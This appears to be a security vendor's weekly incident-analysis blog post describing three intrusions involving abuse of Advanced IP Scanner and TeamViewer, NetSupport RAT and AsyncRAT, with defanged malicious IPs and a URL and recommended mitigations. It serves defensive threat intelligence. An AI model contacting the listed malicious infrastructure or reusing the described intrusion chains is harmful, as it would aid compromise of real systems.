Context, Official Statements, and Possible Solutions for Today’s CrowdStrike BSOD – Windows Host Outage

Before we begin our planned weekly incident analysis, the entire Adversary Pursuit Group and everyone else here at Blackpoint Cyber want to extend good energy to all those IT teams pulling all-nighters for the next few days to get rid of the Blue Screens of Death (BSOD) currently impacting Windows hosts of the flawed Falcon content update — as well as the teams at CrowdStrike and Windows currently pulling together to fix the rollout for all Falcon customers.

As MacKensie Brown, VP of the APG, said today while waiting for her flight at an impacted airport:

While the fix is somewhat simple (albeit extremely manual for recovery), IT operations will be working full throttle. Our thoughts are with those teams, and if anyone needs help, please reach out.

For more information on today’s outage (updated July 20, 2024):

Now, let’s get back to your regularly scheduled Blackpoint Active SOC incident analysis!

Blackpoint Active SOC Weekly Analysis Summary for July 19, 2024

Between July 10-17, 2024, Blackpoint’s Active Security Operations Center (SOC) responded to 122 total incidents. These incidents included 18 on-premises MDR incidents, 2 Cloud Response for Google Workspace, and 102 Cloud Response for Microsoft 365 incidents, with confirmed or likely threat actor use of:

In this blog, we’ll dive into the details behind these select incidents, including why they’re important for partners to account for today – even if they’ve not been attacked yet! – as well as possible mitigations leveraging your current tech stack and Blackpoint Cyber.

Return to Top

Advanced IP Scanner and TeamViewer Incident with Real Estate Partner on July 10, 2024

Topline Takeaways

  • Industry target: Real Estate
  • Attacker information:
    • Advanced IP Scanner
    • TeamViewer
    • attrib.exe
    • Arechclient2 malware
  • Antivirus (AV) and / or EDR present in environment? Yes
  • Threat assessment for partners:
    • The Adversary Pursuit Group (APG) predicts that it is very likely that threat actors will continue to use Advanced IP Scanner for discovery and TeamViewer for persistence to exploit other Real Estate organizations over the next 12 months.
  • Recommended remediations and mitigations:
    • Multifactor authentication (MFA)
    • Application allowlisting and blocklisting
    • Heuristics-based activity monitoring and remediation
    • Dedicated software center

Advanced IP Scanner and TeamViewer Incident Timeline for 2024-07-10

  • Blackpoint’s MDR+R technology alerted to potential theft of passwords and browser information on the host of a Real Estate partner.
  • During their initial investigation, the Active SOC team saw msbuild.exe calling out to a malicious Russian IP.
    • The compromised user account used attrib.exe to hide Advanced IP Scanner.
    • One second later, the threat actor used Advanced IP Scanner in portable mode, renamed to “1644.exe”.
  • Active SOC analysts also observed TeamViewer used at the same time as Advanced IP Scanner.
    • They noted the malicious file “setup164.exe” in the same folder, which has been classified as malware.
    • The user account then grabbed payloads through an unauthorized TeamViewer session.
  • The Active SOC team isolated the impacted device prior to any malware payload deployment, and contacted the Real Estate partner to relay the identified information along with additional remediation advice.
  • Post-incident analysis links the observed Russian IP address, 45.141.87[.]16, to Arechclient2 malware infrastructure (1).

More About Advanced IP Scanner, TeamViewer, and Arechclient2 Malware

Click for more information about Advanced IP Scanner

Advanced IP Scanner is a free network scanner used to analyze local area networks (LANs) (3), and can:

  • Show all network devices,
  • Grant access to shared folders, and
  • Remotely control and switch off computers.

Advanced IP Scanner has been frequently abused by threat groups for reconnaissance and discovery activities. In fact, the Adversary Pursuit Group detailed an incident last week that reviewed the use of Advanced IP Scanner by threat actors, combined with additional abuse of remote desktop protocol (RDP) and multiple brute force attempts to access the environment (4).

Click for more information about TeamViewer

TeamViewer is a remote administration tool that can be used to remotely access machines and conduct regular maintenance activities such as system updates, as well as remote installation and removal of software and services.

Threat actors often find remote management tools an attractive target to exploit and abuse during cyberattacks (5), due to:

  • The access TeamViewer and other remote admin tools provide;
  • The ability to remain undetected and blend into normal environment traffic, evading EDR and AV detections; and
  • The potential for persistent access to compromised networks.

Click for more information about Arechclient2 malware

Arechclient2 is a .NET RAT with numerous capabilities, including multiple stealth functions. Blue teams and security researchers have previously observed threat actors using Arechclient2 malware to conduct a wide variety of malicious activities (2), including:

  • Profiling victim systems;
  • Stealing information, such as browser and crypto-wallet data; and
  • Launching a hidden secondary desktop to control browser sessions.

APG Threat Analysis of Advanced IP Scanner and TeamViewer Abuse for 2024

Click for details

The APG predicts that threat actors will very likely continue to abuse legitimate tools – such as Advanced IP Scanner for discovery and TeamViewer for persistence – over the next 12 months.

We assesses that threat actors will very likely continue to abuse legitimate tools, such as Advanced IP Scanner and TeamViewer, over the next 12 months. This assessment is based on internal Blackpoint observed attacks, as well as external incident reports detailing the abuse of these tools during cyber incidents.

The APG has tracked at least 21 ransomware operations that have been observed using Advanced IP Scanner during reported incidents, including:

  • INC Ransom
  • Akira
  • Phobos

We’ve also tracked at least four ransomware operations that have used TeamViewer during reported incidents, including:

  • BianLian
  • LockBit
  • Trigona

As for external reports, a particularly relevant report published on the abuse of TeamViewer and other RMM tools just last month.

In June 2024, the Health Information Sharing and Analysis Center (Health-ISAC) issued a warning related to threat actors exploiting the TeamViewer software to gain persistent access to victim network.

The warning related to APT29’s (AKA Cozy Bear, Midnight Blizzard) reported compromise of TeamViewer (6). Threat actors target RMM tools, such as TeamViewer because these tools are often integrated into client networks in a way that provides privileged access to the threat actors. Threat actors are very likely going to continue both targeting RMM tools for compromise to access their clients and deploying the tools for remote access during active incidents over the next 12 months.

Recommended Advanced IP Scanner and TeamViewer Abuse Mitigations and Remediations

Click for details

Blackpoint’s APG recommends the following actions to help mitigate the malicious abuse of legitimate tools such as Advanced IP Scanner and TeamViewer.

  • Enable multi-factor authentication (MFA), which can help identify malicious or anomalous logins and require an additional step for securing user accounts.
  • Implement application controls to help manage and control the installation of software, including network scanners.
  • Monitor system activity through heuristics-based triggers and alerts, which can aid in identifying the malicious install, use, and presence of unapproved tools and malicious activities on devices.
  • Provide a dedicated software center, which allows employees to download approved software from a safe and monitored location. Dedicated and approved software can aid in detecting software, such as Advanced IP Scanner, that is installed from a third-party location outside of a dedicated center.

Return to Top

NetSupport RAT Incident with Technology Partner on July 10, 2024

Topline Takeaways

  • Industry target: Technology
  • Attacker information:
    • NetSupport RAT
    • wscript.exe
    • .js initial access file
  • Antivirus (AV) and / or EDR present in environment? Yes
  • Threat assessment for partners:
    • The Adversary Pursuit Group (APG) predicts that it is very likely that threat actors will continue to use NetSupport RAT for persistence to exploit other Technology organizations over the next 12 months.
  • Recommended remediations and mitigations:
    • Employee security training
    • Scripting language controls
    • Multifactor authentication (MFA)
    • Zero trust network architecture

NetSupport RAT Incident Timeline for 2024-07-10

  • Blackpoint’s MDR+R technology alerted to a suspicious PowerShell detection on the host of a Technology partner.
  • Upon further investigation by the Active SOC, it is likely the initial access vector was the execution of a .js file via wscript.exe.
    • After the execution, Active SOC analysts observed powershell.exe calling out an external domain and reading encoded b64 PowerShell hosted on the domain’s web page.
    • The domain identified, hxxp[://]dfwreds[.]com/data[.]php?9351, has been associated with the NetSupport RAT (7).
  • The Active SOC team isolated the affected host to prevent additional malicious activity, before reaching out to the Real Estate partner with more information and remediation advice.

More About NetSupport RAT

Click for details

NetSupport Manager is a legitimate remote support tool that has been frequently abused by multiple threat actors (8). NetSupport RAT is a malicious spinoff of the legitimate NetSupport Manager that can:

  • Transfer files,
  • Remotely access compromised environments,
  • Keylog, and
  • Take control of system resources.

The Adversary Pursuit Group (APG) has previously detailed incidents that involved the likely use of NetSupport RAT, including multiple NetSupport RAT attacks during late June 2024 against Real Estate, Institutions & Organizations, and Industrials partners (9). The tool is used by multiple threat groups due to its availability and capabilities; therefore, post-incident attribution can be difficult.

APG Threat Analysis of NetSupport RAT for 2024

Click for details

The APG predicts that threat actors will very likely continue to use NetSupport RAT for persistence over the next 12 months.

We base this assessment on internal Blackpoint observed attacks which correspond to multiple external incident reports covering NetSupport RAT use.

For example, in March 2024, Perception Point researchers reported on a campaign, PhantomBlu, that involved the deployment of the NetSupport RAT (10). The threat actors delivered email messages that appeared to be from an accounting service, luring victims into downloading an attached Office Word file.

Recommended NetSupport RAT Mitigations and Remediations

Click for details

The APG recommends the following actions to help mitigate the use of NetSupport RAT for malicious activities.

  • Conduct employee security awareness training, including how to spot a phishing email and how and when to report them to an incident response authority. As many threat actors still rely on social engineering tactics to gain initial access, security training can help lower the risk of falling victim to download malicious software or legitimate tools for malicious actions.
  • Minimize the use of – or implement strict controls on – scripting languages, which can limit a threat actors’ ability to leverage scripts for malicious actions on compromised end user accounts.
  • Multifactor authentication (MFA) and VPN use where feasible, ensuring only identified and authorized employees can access sensitive data and resources with an additional level of credential authentication.
  • Operate from a zero-trust mentality, which assumes that all requests to each resource are malicious, and encourages aggressive and continuous monitoring and management.

Return to Top

AsyncRAT Incident with Financials Partner on July 15, 2024

Topline Takeaways

  • Industry target: Financials
  • Attacker information:
    • AsyncRAT
    • Scheduled task “TvMusic2”
    • wscript.exe
  • Antivirus (AV) and / or EDR present in environment? Yes-EDR
  • Threat assessment for partners:
    • The Adversary Pursuit Group (APG) predicts that it is likely that threat actors will continue to use AsyncRAT for persistence to exploit other Financials organizations over the next 12 months.
  • Recommended remediations and mitigations:
    • Employee security training
    • Least-privilege access controls
    • Heuristics-based activity monitoring and remediation
    • Password managers

AsyncRAT Incident Timeline for 2024-07-15

  • Blackpoint’s MDR+R technology alerted to a threat mitigation on Financial partner’s hosts.
  • The Active SOC team conducted further investigation, identifying suspicious obfuscated PowerShell scripts.
    • These PowerShell scripts remotely connected to domains and various IP addresses with poor reputations, while also creating a malicious scheduled task called “TvMusic2”.
    • Previous reports connect one IP address, 193.26.115[.]78, to the AsyncRAT malware variant (11).
  • Active SOC analysts isolated the affected devices to prevent any further malicious activity, and then reached out to the Financials partner to discuss incident details and additional remediation recommendations.

More About AsyncRAT

Click for details

Active since at least 2019, AsyncRAT is a remote access trojan (RAT) whose capabilities include but are not limited to:

  • Capture keystrokes on the victim’s machine,
  • Gain persistence via scheduled tasks,
  • View the screen, and
  • Examine running processes (12).

Multiple threat groups use AsyncRAT, which makes attribution more difficult.

Finally, AsyncRAT is often distributed via:

  • Email campaigns with malicious attachments,
  • Infected ads on compromised websites, and
  • Other malware variant drops.

APG Threat Analysis of AsyncRAT for 2024

Click for details

The APG predicts that threat actors will likely continue to use AsyncRAT for persistence over the next 12 months.

This assessment is based on a wide range of Active SOC-observed attacks within Blackpoint-protected environments, including other publicly analyzed attacks on (13):

In addition to the APG’s own internal analysis, AsyncRAT makes frequent appearances in external security research, including:

  • In January 2024, AT&T Alien Labs security researchers reported a campaign delivering AsyncRAT through an initial JavaScript file embedded in a phishing page (14), involving more than 300 samples and over 100 domains.
  • In July 2024, eSentire security researchers reported several instances of users downloading the ScreenConnect remote access client, ultimately leading to AsyncRAT deployment (15).
    • In one case, a user downloaded the ScreenConnect instance from a compromised WordPress website, which redirected the user to a malicious site and eventually AsyncRAT’s download.

Recommended AsyncRAT Mitigations and Remediations

Click for details

The APG recommends the following actions to help mitigate the deployment and use of AsyncRAT for persistence and exfiltration.

  • Conduct employee security awareness training, including how to spot a phishing email and how and when to report them to an incident response authority.
  • Implement the practice of least privilege, which will help ensure regular user accounts are unable to install certain tools and conducting certain activities.
  • Monitor system activity through heuristics-based triggers and alerts, which can help identify legitimate software being installed or used in suspicious or abnormal methods and identify behaviors.
  • Require the use of secure password managers, disabling plaintext password storage and local password caching to make accessing passwords by threat actors from compromised accounts more difficult.

References and Resources

A quick note on incident details:

As these analyses concern recent incidents in actively monitored environment, certain details may be occasionally omitted and / or obfuscated, to better secure our partners and protect any still-ongoing investigations.

However, we felt that these incidents were important enough to bring to the community’s attention as fast as possible, and so included them in this public writeup.

Please feel free to reach out to the APG directly if you have any questions about a specific incident!

Click for full list of references and resources
  1. VirusTotal’s Repository: “45.141.87.16 (45.141.84.0/22)” by VirusTotal on 2024-07-17
  2. Blackpoint Cyber’s Whitepaper: “Ratting Out Arechclient2” by Blackpoint Cyber on 2022-11
  3. Advanced IP Scanner’s Website: “Advanced IP Scanner” by Famatech Corp. on N/A
  4. Blackpoint Cyber’s Blog: “LuminousMoth, Tnega Malware, Advanced IP Scanner, RDP Abuse, and SolarMarker” by Blackpoint Cyber on 2024-07-11
  5. Blackpoint Cyber’s Blog: “Vulnerable RMM Tools and Vulnerable Industries: Why Vigilance is Key” by Blackpoint Cyber on 2024-03-28
  6. The HIPAA Journal’s Blog: “Health-ISAC Issues Warning Abuse of TeamViewer Remote Connectivity Software” by Steve Adler on 2024-06-28
  7. “VirusTotal’s Repository: “hxxp://dfwreds.com/data.php?9351dfwreds[.]com” by VirusTotal on 2024-07-17
  8. Vmware’s Blog: “NetSupport RAT: The RAT King Returns” by Alan Ngo; Abe Schneider; Fae Carlisle on 2023-11-20
  9. Blackpoint Cyber’s Blog: “Brute Ratel, Advanced IP Scanner, and NetSupport RAT” by Blackpoint Cyber on 2024-06-28
  10. Perception Point ‘s Blog: “Operation PhantomBlu: New and Evasive Method Delivers NetSupport RAT” by Areal Davidpur; Peleg Cabra on 2024-03-18
  11. VirusTotal’s Repository: “193.26.115.78 (193.26.115.0/24)” by VirusTotal on 2024-07-17
  12. MITRE’s Repository: “AsyncRAT” by MITRE on 2023-10-10
  13. Blackpoint Cyber’s Blog: “AsyncRAT, NetSupport RAT, and VssAdmin Abuse for Shadow Copy Deletion” by Blackpoint Cyber on 2024-06-21
  14. AT&T’s Blog: “AsyncRAT loader: Obfuscation, DGAs, decoys and Govno” by Fernando Martinez on 2024-01-05